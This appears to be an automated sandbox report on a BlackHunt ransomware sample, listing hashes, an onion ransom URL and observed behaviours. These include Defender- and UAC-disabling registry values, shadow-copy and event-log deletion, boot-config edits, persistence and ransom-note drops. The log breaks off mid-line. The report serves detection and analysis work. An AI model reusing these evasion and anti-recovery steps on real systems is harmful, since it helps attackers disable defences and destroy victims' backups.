Analysis
-
max time kernel
132s -
max time network
125s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
19-01-2024 01:28
Static task
static1
Behavioral task
behavioral1
Sample
f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe
Resource
win10v2004-20231222-en
General
-
Target
f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe
-
Size
707KB
-
MD5
dc0f6378a2cc070250c5a7da3be447cb
-
SHA1
01eac35464013979f761ead5354ba29769019a58
-
SHA256
f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015
-
SHA512
2d44642fed2b9b43feca54bf164e65913b202f901d0728aaea38bf44310b05e49ca9813eae01b7784e0b1380743f6b60aa71c6e4b491021ca5762b4b1cab060e
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1F8kvnh:6uaTmkZJ+naie5OTamgEoKxLWoah
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 10752 fsutil.exe 5564 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 11260 wevtutil.exe 11276 wevtutil.exe 11100 wevtutil.exe 12884 wevtutil.exe 5632 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 9584 bcdedit.exe 10340 bcdedit.exe 10652 bcdedit.exe 11712 bcdedit.exe -
Renames multiple (3365) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 10756 wbadmin.exe 12124 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\E: f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened (read-only) \??\U: f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened (read-only) \??\K: f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened (read-only) \??\W: f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened (read-only) \??\R: f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened (read-only) \??\S: f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened (read-only) \??\J: f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened (read-only) \??\H: f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened (read-only) \??\L: f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\P: f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened (read-only) \??\V: f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened (read-only) \??\B: f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened (read-only) \??\N: f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened (read-only) \??\M: f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened (read-only) \??\Q: f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened (read-only) \??\O: f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened (read-only) \??\G: f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\T: f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened (read-only) \??\A: f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened (read-only) \??\X: f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened (read-only) \??\Y: f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened (read-only) \??\I: f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened (read-only) \??\Z: f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened (read-only) \??\F: fsutil.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 3 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\VideoLAN\VLC\locale\ms\#BlackHunt_ReadMe.hta f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\spectrum_spinner_process.svg f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\hr-hr\ui-strings.js f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\files_icons.png f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\en-ae\#BlackHunt_ReadMe.txt f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\en-gb\#BlackHunt_ReadMe.txt f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files\7-Zip\Lang\pl.txt f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files\RegisterDeny.bin f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\zh-tw\AppStore_icon.svg f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\zh-hk_get.svg f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\da-dk\#BlackHunt_Private.key f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\libs\require\#BlackHunt_ReadMe.txt f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\da-dk\ui-strings.js f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\da-dk\#BlackHunt_ReadMe.hta f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-gb\#BlackHunt_ReadMe.hta f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files\7-Zip\Lang\es.txt f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\core_icons.png f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files\VideoLAN\VLC\plugins\services_discovery\#BlackHunt_ReadMe.hta f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\arrow-left.png f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\nb-no\ui-strings.js f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\css\main.css f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ko-kr\#BlackHunt_ReadMe.txt f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ar-ae\#BlackHunt_ReadMe.txt f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files\7-Zip\Lang\mng2.txt f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\[email protected] f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\s_checkbox_selected_18.svg f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\collect_feedback\#BlackHunt_ReadMe.hta f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\en-gb\#BlackHunt_ReadMe.hta f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\en-ae\ui-strings.js f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ja-jp\#BlackHunt_Private.key f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\s_shared_single_filetype.svg f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\nl-nl\#BlackHunt_ReadMe.txt f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files\VideoLAN\VLC\lua\sd\#BlackHunt_Private.key f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fr-fr\#BlackHunt_ReadMe.txt f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\fi-fi\#BlackHunt_ReadMe.hta f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\hu-hu\#BlackHunt_Private.key f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\#BlackHunt_ReadMe.hta f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files\Java\jre-1.8\legal\javafx\#BlackHunt_Private.key f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files\VideoLAN\VLC\locale\am\#BlackHunt_ReadMe.hta f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\#BlackHunt_ReadMe.hta f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\pl-pl\#BlackHunt_ReadMe.txt f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\vlc.mo f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\drvSOFT.x3d f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\es-es\#BlackHunt_ReadMe.txt f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\fr-ma\#BlackHunt_ReadMe.hta f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\zh-tw\#BlackHunt_ReadMe.hta f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\pl-pl\#BlackHunt_Private.key f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\limited\local_policy.jar f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files\VideoLAN\VLC\locale\ka\#BlackHunt_ReadMe.txt f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ko-kr\#BlackHunt_ReadMe.txt f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\he-il\#BlackHunt_ReadMe.hta f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\sk-sk\ui-strings.js f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-il\#BlackHunt_Private.key f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\de-de\#BlackHunt_ReadMe.txt f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files\ConvertFromTest.TTS f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons_hiContrast_bow.png f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files\VideoLAN\VLC\locale\sr\LC_MESSAGES\#BlackHunt_ReadMe.txt f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\pt-br\ui-strings.js f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ja-jp\#BlackHunt_Private.key f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\en-il\ui-strings.js f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\root\#BlackHunt_ReadMe.txt f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ca-es\ui-strings.js f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\javafx\public_suffix.md f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 5640 3536 WerFault.exe 295 -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 6260 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 11144 vssadmin.exe 10400 vssadmin.exe 11432 vssadmin.exe 11720 vssadmin.exe 7352 vssadmin.exe 5168 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 6304 taskkill.exe -
Modifies registry class 9 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon Conhost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" Conhost.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 6120 PING.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2468 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2468 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe Token: SeRestorePrivilege 2468 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe Token: SeBackupPrivilege 2468 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe Token: SeTakeOwnershipPrivilege 2468 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe Token: SeAuditPrivilege 2468 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe Token: SeSecurityPrivilege 2468 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe Token: SeIncBasePriorityPrivilege 2468 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe Token: SeBackupPrivilege 10712 vssvc.exe Token: SeRestorePrivilege 10712 vssvc.exe Token: SeAuditPrivilege 10712 vssvc.exe Token: SeBackupPrivilege 8904 wbengine.exe Token: SeRestorePrivilege 8904 wbengine.exe Token: SeSecurityPrivilege 8904 wbengine.exe Token: SeSecurityPrivilege 11260 wevtutil.exe Token: SeBackupPrivilege 11260 wevtutil.exe Token: SeSecurityPrivilege 11276 wevtutil.exe Token: SeBackupPrivilege 11276 wevtutil.exe Token: SeSecurityPrivilege 11100 wevtutil.exe Token: SeBackupPrivilege 11100 wevtutil.exe Token: SeSecurityPrivilege 12884 wevtutil.exe Token: SeBackupPrivilege 12884 wevtutil.exe Token: SeSecurityPrivilege 5632 wevtutil.exe Token: SeBackupPrivilege 5632 wevtutil.exe Token: SeDebugPrivilege 6304 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2468 wrote to memory of 4432 2468 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 92 PID 2468 wrote to memory of 4432 2468 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 92 PID 2468 wrote to memory of 1980 2468 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 171 PID 2468 wrote to memory of 1980 2468 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 171 PID 2468 wrote to memory of 692 2468 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 96 PID 2468 wrote to memory of 692 2468 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 96 PID 2468 wrote to memory of 4896 2468 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 98 PID 2468 wrote to memory of 4896 2468 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 98 PID 2468 wrote to memory of 2540 2468 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 99 PID 2468 wrote to memory of 2540 2468 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 99 PID 2468 wrote to memory of 4448 2468 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 102 PID 2468 wrote to memory of 4448 2468 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 102 PID 4432 wrote to memory of 2320 4432 cmd.exe 103 PID 4432 wrote to memory of 2320 4432 cmd.exe 103 PID 1980 wrote to memory of 372 1980 reg.exe 105 PID 1980 wrote to memory of 372 1980 reg.exe 105 PID 2468 wrote to memory of 2124 2468 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 178 PID 2468 wrote to memory of 2124 2468 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 178 PID 692 wrote to memory of 4716 692 cmd.exe 108 PID 692 wrote to memory of 4716 692 cmd.exe 108 PID 2468 wrote to memory of 1108 2468 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 112 PID 2468 wrote to memory of 1108 2468 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 112 PID 2540 wrote to memory of 64 2540 cmd.exe 109 PID 2540 wrote to memory of 64 2540 cmd.exe 109 PID 4896 wrote to memory of 2944 4896 cmd.exe 160 PID 4896 wrote to memory of 2944 4896 cmd.exe 160 PID 2468 wrote to memory of 1424 2468 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 186 PID 2468 wrote to memory of 1424 2468 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 186 PID 2468 wrote to memory of 1472 2468 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 115 PID 2468 wrote to memory of 1472 2468 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 115 PID 4448 wrote to memory of 3360 4448 cmd.exe 117 PID 4448 wrote to memory of 3360 4448 cmd.exe 117 PID 2468 wrote to memory of 4792 2468 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 194 PID 2468 wrote to memory of 4792 2468 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 194 PID 2124 wrote to memory of 1704 2124 cmd.exe 118 PID 2124 wrote to memory of 1704 2124 